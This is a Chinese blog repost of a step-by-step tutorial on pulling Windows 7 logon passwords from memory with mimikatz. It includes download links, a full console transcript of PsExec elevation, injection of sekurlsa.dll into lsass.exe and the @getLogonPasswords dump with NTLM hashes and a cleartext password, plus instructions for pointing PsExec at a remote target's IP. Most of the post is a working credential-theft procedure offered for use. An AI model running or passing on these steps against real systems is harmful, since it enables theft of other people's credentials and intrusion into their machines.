您的位置:首页 > 其它

用mimikatz来获取win7的密码

2013-04-23 20:33 2166 查看
mimikatz下载地址:

http://www.webshell.cc/wp-content/uploads/2012/02/mimikatz_trunk.zip

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip

blog.gentilkiwi.com应该是法国佬的博客。

用mimikatz来获取win7的密码:

Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Users\Administrator>cd C:\mimikatz_trunk\tools

C:\mimikatz_trunk\tools>PsExec.exe \\127.0.0.1 cmd.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>cd C:\mimikatz_trunk\Win32

C:\mimikatz_trunk\Win32>mimikatz.exe mimikatz.exe
mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz 
mimikatz # privilege::debug
Demande d'ACTIVATION du privil猫ge : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connect茅 脿 un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des donn茅es de s茅curit茅s dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;395889
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : WIN-S1J6267VPKL
msv1_0 :        lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }
wdigest :       yang
tspkg :         yang

Authentification Id         : 0;155584
Package d'authentification  : NTLM
Utilisateur principal       : ANONYMOUS LOGON
Domaine d'authentification  : NT AUTHORITY
msv1_0 :        n.t. (LUID KO)
wdigest :       n.t. (LUID KO)
tspkg :         n.t. (LUID KO)

Authentification Id         : 0;75419
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : WIN-S1J6267VPKL
msv1_0 :        lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }
wdigest :       yang
tspkg :         yang

Authentification Id         : 0;997
Package d'authentification  : Negotiate
Utilisateur principal       : LOCAL SERVICE
Domaine d'authentification  : NT AUTHORITY
msv1_0 :        n.t. (LUID KO)
wdigest :
tspkg :         n.t. (LUID KO)

Authentification Id         : 0;996
Package d'authentification  : Negotiate
Utilisateur principal       : WIN-S1J6267VPKL$
Domaine d'authentification  : WORKGROUP
msv1_0 :        n.t. (LUID KO)
wdigest :
tspkg :         n.t. (LUID KO)

Authentification Id         : 0;40847
Package d'authentification  : NTLM
Utilisateur principal       :
Domaine d'authentification  :
msv1_0 :        n.t. (LUID KO)
wdigest :       n.t. (LUID KO)
tspkg :         n.t. (LUID KO)

Authentification Id         : 0;999
Package d'authentification  : NTLM
Utilisateur principal       : WIN-S1J6267VPKL$
Domaine d'authentification  : WORKGROUP
msv1_0 :        n.t. (LUID KO)
wdigest :
tspkg :         n.t. (LUID KO)

mimikatz # exit
Fermeture du canal de communication

C:\mimikatz_trunk\Win32>


wdigest后面的就是密码。如上所示,我的win7的Administrator的密码是yang。

工具的作者的blog:http://blog.gentilkiwi.com/mimikatz

解释:

privilege::debug //提升权限

inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll" //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!

@getLogonPasswords //抓取密码

exit //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环

另外,我测试的时候,是在win7上测试的。还可以在XP上来连接win7,只需要修改一下IP,例如:

PsExec.exe \\192.168.1.123 cmd.exe


把上面的192.168.1.123改为目标的IP。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: